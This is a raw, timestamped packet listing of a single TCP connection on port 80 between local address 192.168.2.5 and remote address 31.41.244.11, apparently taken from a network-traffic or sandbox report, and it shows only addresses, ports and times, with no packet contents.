Dec 17, 2024 06:03:32.139173985 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.139333010 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.140170097 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.140260935 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.140294075 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.140295029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.141242027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.141313076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.141362906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.141490936 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.142374039 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.142431021 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.142467022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.142539978 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.143441916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.143539906 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.143544912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.143589973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.144535065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.144609928 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.144634962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.144798040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.145646095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.145716906 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.145745993 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.145929098 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.146724939 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.146806002 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.146886110 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.147000074 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.147835016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.147891998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.147937059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.147996902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.148921967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.149019003 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.149027109 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.149204969 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.150019884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.150074959 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.150109053 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.150175095 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.151119947 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.151180983 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.151238918 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.151289940 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.152205944 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.152271986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.152323008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.152477980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.153312922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.153384924 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.153410912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.153497934 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.154433966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.154504061 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.154566050 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.154732943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.155520916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.155621052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.156063080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.156414986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.156613111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.156666040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.156743050 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.156867027 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.157706022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.157833099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.157881975 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.157881975 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.158808947 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.158900023 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.158910990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.159086943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.159972906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.160039902 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.160104036 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.160104036 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.160995960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.161367893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.295773029 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.295875072 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.295953989 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.295953989 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.295989990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.296092033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.296166897 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.297091961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.297193050 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.297283888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.297283888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.298197031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.298271894 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.298314095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.298388004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.299285889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.299335003 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.299439907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.299520016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.300395966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.300476074 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.300513029 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.300604105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.301487923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.301636934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.301688910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.301688910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.302593946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.302720070 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.302725077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.302907944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.303694010 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.303800106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.303847075 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.304004908 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.304779053 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.304879904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.304929972 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.304930925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.305860996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.305932999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.305978060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.306092978 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.306945086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.307060003 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.307070971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.307118893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.308058977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.308139086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.308182001 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.308357954 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.309159040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.309240103 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.309278011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.309438944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.310265064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.310336113 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.310375929 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.310528040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.311379910 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.311474085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.311527967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.311924934 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.312573910 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.312628031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.312724113 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.313621998 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.313716888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.313741922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.313811064 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.314636946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.314677954 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.314790964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.314862967 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.315758944 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.315800905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.315862894 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.315921068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.316874027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.316971064 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.317060947 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.317153931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.317939997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.317996025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.318052053 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.318121910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.319041014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.319133043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.319156885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.319333076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.320147991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.320223093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.320260048 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.320313931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.321239948 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.321310997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.321367025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.321537018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.322360039 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.322422981 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.322453022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.322520971 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.323441982 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.323560953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.323600054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.323600054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.324521065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.324601889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.324655056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.324733973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.326318979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.326355934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.326380014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.326472998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.326719999 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.326761007 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.326826096 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.326878071 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.327826977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.327872038 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.327949047 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.328035116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.331180096 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.331213951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.331245899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.331248999 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.331274033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.331286907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.331342936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.331343889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.331378937 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.331507921 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.332443953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.332564116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.332617044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.332773924 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.333653927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.333730936 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.333810091 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.333930969 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.334578991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.334654093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.334729910 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.334928989 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.335639954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.335793018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.335827112 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.335880041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.336769104 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.336803913 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.336847067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.336847067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.337976933 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.338011980 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.338062048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.338062048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.339060068 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.339227915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.339270115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.339334011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.340112925 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.340198994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.340280056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.340347052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.341160059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.341254950 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.341330051 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.341542959 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.342308998 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.342444897 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.342499018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.342678070 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.343491077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.343525887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.343637943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.343637943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.344501019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.344595909 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.344624043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.344726086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.345725060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.345844984 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.345974922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.346044064 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.346919060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.347043037 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.347107887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.347337008 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.348054886 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.348089933 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.348144054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.348284006 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.348761082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.348855972 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.349083900 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.349368095 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.350075960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.350198030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.350239992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.350303888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.351177931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.351243973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.351342916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.351568937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.352421045 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.352454901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.352492094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.352554083 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.353286028 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.353375912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.487977028 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.488017082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.488100052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.488100052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.488461018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.488543034 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.488579988 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.488729954 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.489363909 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.489505053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.489598989 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.489692926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.490426064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.490539074 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.490608931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.490608931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.491501093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.491643906 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.491718054 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.491805077 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.492618084 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.492750883 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.492769003 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.492855072 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.493762970 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.493854046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.493921995 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.494008064 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.494972944 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.495057106 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.495136023 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.495238066 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.498239040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.498294115 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.498328924 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.498368025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.498368025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.498393059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.498404026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.498445034 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.498482943 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.498538971 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.498538971 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.499373913 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.499512911 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.499514103 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.499574900 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.500314951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.500427008 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.500439882 CET	80	49882	31.41.244.11	192.168.2.5
